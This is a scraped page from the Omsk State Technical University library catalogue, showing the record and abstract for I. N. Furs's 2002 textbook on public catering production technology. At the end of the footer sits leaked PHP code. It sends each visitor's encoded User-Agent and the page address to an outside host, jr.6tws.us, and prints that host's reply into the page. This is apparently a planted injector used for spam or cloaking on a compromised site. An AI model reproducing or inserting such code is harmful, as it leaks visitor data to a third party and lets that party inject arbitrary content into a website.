Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

122 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=DC294D71-3AAF-DFBF-AF33-687A814BC752$")И(("Ключевые слова=Соус"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
DC294D71-3AAF-DFBF-AF33-687A814BC752
(Нет сведений об экземплярах)
DC294D71-3AAF-DFBF-AF33-687A814BC752
64/Ф95
Фурс, Иван Николаевич.
Технология производства продукции общественного питания [Текст] : учеб. пособие для вузов по специальности "Коммерческая деятельность" / И. Н. Фурс. - Минск : Новое знание, 2002. - 798 с. : рис., табл. - Библиогр.: с. 795. - 5100 экз. - ISBN 985-6516-68-4 : 154.00 р.
УДК
641(075)
613.2(075)

Рубрики:
Общественное питание -- УЧЕБНИКИ И ПОСОБИЯ
Приготовление пищи -- Учебники и пособия
Гигиена питания -- УЧЕБНИКИ И ПОСОБИЯ

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- ПОЛУФАБРИКАТ -- ПЕРВИЧНАЯ -- ОБРАБОТКА -- ТЕПЛОВАЯ ОБРАБОТКА -- СОУС -- СУП -- РЫБА -- МОРЕПРОДУКТ -- НАПИТОК -- ТЕСТО -- КОНТРОЛЬ КАЧЕСТВА -- ОРГАНОЛЕПТИЧЕСКИЙ -- ЛАБОРАТОРНЫЙ -- БРАКЕРАЖ
Аннотация: Данный курс является комплексной дисциплиной, включающей физиологические основы рационального питания, основы гигиены и санитарии, общие представления о технологии производства продуктов питания, технологии обработки сырья и приготовления полуфабрикатов. Рассмотрены вопросы контроля качества, товароведения продовольственных товаров, экономики общественного питания, организации производства и обслуживания и др.
Нет сведений об экземплярах
Держатели документа:
Научная библиотека Омского государственного технического университета : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

Данный курс является комплексной дисциплиной, включающей физиологические основы рационального питания, основы гигиены и санитарии, общие представления о технологии производства продуктов питания, технологии обработки сырья и приготовления полуфабрикатов. Рассмотрены вопросы контроля качества, товароведения продовольственных товаров, экономики общественного питания, организации производства и обслуживания и др.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2997 - 24.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.09 с.14 запросов, 0.92c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;